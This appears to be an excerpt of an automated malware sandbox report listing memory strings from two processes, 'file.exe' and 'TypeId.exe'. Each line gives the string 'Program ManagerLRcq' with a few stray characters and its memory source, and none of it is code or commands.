                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqtfo
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqlUp
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<x
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<z
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<y
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<|
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTg`
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<~
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqxnd
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@4
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@6
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@8
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@7
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@:
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@9
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@,
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@-
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@#
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@&
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@(
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@*
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@)
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|5g
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(j|
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXl
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXk
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqh&z
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXn
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXp
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\QY
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt?i
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX\
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX[
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX`
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXT
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPz[
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXX
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq [r
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqYe
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq$
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq,tf
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcql0d
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq#
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq"
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|O|
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|Ph
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXs
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXu
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\1
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\3
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\5
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq`[[
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq \{
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\$
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\&
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\%
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt@r
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq0:}
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(lq
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\O
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\V
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhlZ
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\H
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\J
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\TW
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\@
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTCX
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\C
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\E
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\7
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\:
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\<
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\>
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\=
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8Eb
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\Lf
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT_
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTa
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq,-_
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTd
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTc
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq`S{
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT]
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq`Tg
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTO
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTR
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTQ
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTV
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD_Z
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTx
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTw
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXDq
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTp
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTq
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTs
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTu
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX+
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLpY
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX$
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH&b
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX&
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX(
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX'
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX*
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8GW
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqpvl
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqd^i
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXL
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXM
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXP
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXO
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXQ
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq Y}
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXF
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXJ
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX<
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqloh
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXA
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX4
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqh%q
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\Od
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX6
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX:
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqpwu
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX9
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPd
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPf
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt7Z
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq48z
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPg
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPi
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHa|
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP^
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPb
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq( w
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPT
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPV
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPW
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPZ
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq00m
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPO
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPQ
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8Bd
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPr{
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq01v
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP|
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq,)~
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPsg
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP}
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<Iy
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPu
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPz
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|HY
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPr
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT(
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT)
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT,
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT+
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT.
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT-
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHcq
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT&
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLkf
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@Sc
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL*y
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(fW
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTJ
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTL
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT?
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT}i
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPtp
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT:
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT9
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT<
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT;
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT>
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT=
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT0
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq4;x
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT/
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt:X
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXB|
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq4~Z
